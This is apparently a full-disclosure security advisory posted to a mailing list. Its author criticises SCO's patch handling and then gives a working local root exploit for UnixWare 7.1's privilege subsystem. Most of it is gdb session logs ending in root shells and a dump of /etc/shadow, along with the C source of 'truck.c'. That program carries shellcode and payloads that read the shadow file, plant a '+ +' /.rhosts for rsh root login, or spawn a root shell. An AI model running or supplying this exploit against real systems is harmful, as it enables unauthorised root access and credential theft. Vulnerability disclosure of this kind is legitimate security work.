OVERVIEW A flaw in SCO UnixWare's security model will allow any user to gain root, read system files, etc. RANT I'm sure many of you are wondering what the response from the people from SCO has been regarding all of these UnixWare problems. Nil. First, a little background. Back when I began my UnixWare audit with the dos7utils explo it, I was contacted and asked to please submit any bugs I find to the UnixWare security team. Of course I had no problem with this, since my goal is supposedly the same as theirs: to secure UnixWare. I immediately submitt= ed my su and uidadmin exploits and told then about the gethostbyname() overflow= =2E I was told that these were "known" bugs (known, evidently, to SCO only) and= nothing more. I foolishly assumed that this meant they were working on a fix but did no= t have one ready. It turns out that what they meant by this was "We have a= fix ready, but we are going to sit on it until it becomes public." SCO had completely abused my decision to submit to them then wait for a fix. Any= one notice how quickly they got out the gethostbyname(), su and uidadmin fixe= s but have yet to fix the other problems I've found but didn't tell them about?= = Chances are excellent that if I had never posted these exploits, crackers= would've continued exploiting UnixWare until SCO silently fixed the probl= ems in 7.2. = Wake up, SCO! The underground cracker community is already exploiting al= l the problems I'm finding! You're only hurting your customers by waiting unti= l the next release, or until someone posts publicly. Take a proactive stance o= n security by finding problems internally (or with the help of people like = me) and then tell the world at large. To assume that you = and I are the only ones capable of finding these holes is an insult to yo= ur customers. I've yet to recieve a word from SCO about my recent slew of exploits. My= guess is that they were just happy to buy a few months of time before I started posting. BACKGROUND Please read my "uidadmin + discussion" advisory for more information abou= t UnixWare's privileged process system. The techniques discussed herein ha= ve only been tested on SCO UnixWare 7.1. While earlier versions of UW are probably affected, SCO OpenServer does not use this particular security m= odel and are therefore not affected. DETAILS As Aleph One put it, in his response to my Vuln-Dev post: =2E.. SCO has implemented privileges in UnixWare without thinking of possible interaction with other subsystems. They should have placed the same restriction on application running with privileges as those placed on applications running suid or sgid. I am surprised no one before noticed t= his. Its a hole you could drive a truck through. The engineers that coded = the privilege system (a security subsystem!) should get a good ass chewin= g or get fired. =2E.. Indeed this is true. This security subsystem *itself*, not the programs encompassed by it, has cause more compromises than all the problems I fou= nd in the suid/sgids. Consider that a privileged program which is simply = void main() { printf("sekure\n"); } can be compromised just as readily one which is 10000 lines of spaghetti = code. The specific problem lies in the fact that any user who runs one of thes= e privileged processes (that are not suid/sgid, but are in /etc/security/tcb/privs) has full control over the process. By = using a debugger, we can stop the program, insert registers and control program flow. Any program in the privs file which is not also suid/sgid = is vulnerable to this exploit, regardless of whatever overflows and symlink vulnerabilities may or may not exist. EXPLOIT The exploit goes like this: - Put nops+shellcode into your environment - load a program which gains privs in /etc/security/tcb/privs with gdb - set a breakpoint at _init - run, and when we hit that breakpoint change our eip to point into our = environment - continue, continue, rootshell Get GDB for UnixWare binaries from ftp.freebird.org Thanks to the teso folks for their suggestions. ----- DACREAD ----- bash-2.02$ ./truck 1 UnixWare 7.1 security model exploit Brock Tellier btellier@usa.net $ ./gdb /usr/ucb/w GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details= =2E GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc... (no debugging symbols found)... (gdb) break _init Breakpoint 1 at 0x804ac34 (gdb) run Starting program: /usr/ucb/w = Program received signal SIGTRAP, Trace/breakpoint trap. [Switching to process 3257] warning: shared library handler failed to enable breakpoint Breakpoint 1, 0x804ac34 in _init () (gdb) disassemble Dump of assembler code for function _init: 0x804ac34 <_init>: ret = End of assembler dump. (gdb) info registers eax 0x0 0 ecx 0x8 8 edx 0x804ac38 134523960 ebx 0x804644c 134505548 esp 0x804643c 134505532 ebp 0x8046440 134505536 esi 0x804bc3c 134528060 edi 0x8046454 134505556 eip 0x804ac34 134523956 eflags 0x100212 1049106 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x0 0 (gdb) set $eip =3D 0x8046b75 (gdb) continue Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. Cannot remove breakpoints because program is no longer writable. It might be running in another process. Further execution is probably impossible. 0xbff99a40 in errno () (gdb) continue Continuing. root:bahbapXFxhypF:10935:::::: daemon:NP:6445:::::: bin:NP:6445:::::: =2E... Program exited normally. (gdb) = ---- DACWRITE ---- bash-2.02$ ./truck 2 UnixWare 7.1 security model exploit Brock Tellier btellier@usa.net $ ./gdb /usr/bin/getdev GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details= =2E GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc... (no debugging symbols found)... (gdb) break _init Breakpoint 1 at 0x830e740 (gdb) run Starting program: /usr/bin/getdev = Program received signal SIGTRAP, Trace/breakpoint trap. [Switching to process 3271] warning: shared library handler failed to enable breakpoint Breakpoint 1, 0x830e740 in _init () (gdb) disassembe Undefined command: "disassembe". Try "help". (gdb) disassemble Dump of assembler code for function _init: 0x830e740 <_init>: ret = End of assembler dump. (gdb) set $eip =3D 0x8046b75 (gdb) continue Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. Cannot remove breakpoints because program is no longer writable. It might be running in another process. Further execution is probably impossible. 0xbff99a40 in errno () (gdb) continue Continuing. # id uid=3D0(root) gid=3D3(sys) groups=3D0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(a= udit),10(nuucp),12(da emon),23(cron),25(dtadmin),47(priv),9(lp) # = ---- SETUID ---- bash-2.02$ ./truck 3 UnixWare 7.1 security model exploit Brock Tellier btellier@usa.net $ ./gdb /usr/ucb/lpr GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details= =2E GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc... (no debugging symbols found)... (gdb) break _init Breakpoint 1 at 0x805036c (gdb) run Starting program: /usr/ucb/lpr = Program received signal SIGTRAP, Trace/breakpoint trap. [Switching to process 3302] warning: shared library handler failed to enable breakpoint Breakpoint 1, 0x805036c in _init () (gdb) disassemble Dump of assembler code for function _init: 0x805036c <_init>: ret = End of assembler dump. (gdb) set $eip =3D 0x8046b75 (gdb) continue Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. Cannot remove breakpoints because program is no longer writable. It might be running in another process. Further execution is probably impossible. 0xbff99a40 in errno () (gdb) continue Continuing. # id uid=3D0(root) gid=3D1(other) groups=3D0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(a= udit),10(nuucp),12(da emon),23(cron),25(dtadmin),47(priv),9(lp) # = --- truck.c --- /** = ** "Its a hole you could drive a truck through." = ** -Aleph One ** ** truck.c UnixWare 7.1 security model exploit ** Demonstrates how we own privileged processes = ** = ** Usage: cc -o truck truck.c ** ./truck where filetype is 1, 2 or 3 = ** (for dacread, dacwrite and setuid, respectively) ** ** This will put $XNEC in the environment and run a shell. ** From there you must use gdb/debug to load a file of the ** type you chose (by checking /etc/security/tcb/privs) ** and setting a breakpoint at _init via "break _init". ** When you "run" and break at _init, change your EIP ** to something between 0x8046000 and 0x8048000 with = ** "set $eip =3D 0x8046b75" and "continue" twice. ** ** ** Brock Tellier btellier@usa.net **/ = #include #include char scoshell[]=3D /* This isn't a buffer overflow! really! */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; = #define LEN 3500 #define NOP 0x90 #define DACWRITE "void main() { system(\"echo + + > /.rhosts; chmod 700 \= /.rhosts; chown root:sys /.rhosts; rsh -l root localhost sh -i \ \"); }\n" #define DACREAD "void main() { system(\"cat /etc/shadow\");}\n" #define SETUID "void main() { setreuid(0,0);system(\"/bin/sh\"); }\n" void usage(int ftype) { fprintf(stderr, "Error: Usage: truck [filetype]\n"); fprintf(stderr, "Where filetype is one of the following: \n"); fprintf(stderr, "1 dacread\n2 dacwrite\n3 setuid\n"); fprintf(stderr, "Note: if file has allprivs, use setuid\n"); } void buildsm(int ftype) { FILE *fp; char cc[100]; fp =3D fopen("/tmp/sm.c", "w"); if (ftype =3D=3D 1) fprintf(fp, DACREAD); else if(ftype =3D=3D 2) fprintf(fp, DACWRITE); else if(ftype =3D=3D 3) fprintf(fp, SETUID); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c"); system(cc); } int main(int argc, char *argv[]) { int i; int buflen =3D LEN; char buf[LEN]; = int filetype =3D 0; char filebuf[20]; = if(argc > 2 || argc =3D=3D 1) { usage(filetype); exit(0); = } if ( argc > 1 ) filetype=3Datoi(argv[1]); if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); } buildsm(filetype); fprintf(stderr, "\nUnixWare 7.1 security model exploit\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); memset(buf,NOP,buflen); memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell)); memcpy(buf, "XNEC=3D", 5); putenv(buf); buf[buflen - 1] =3D 0; system("/bin/sh"); exit(0); } ------ Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier@usa.net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=3D= 1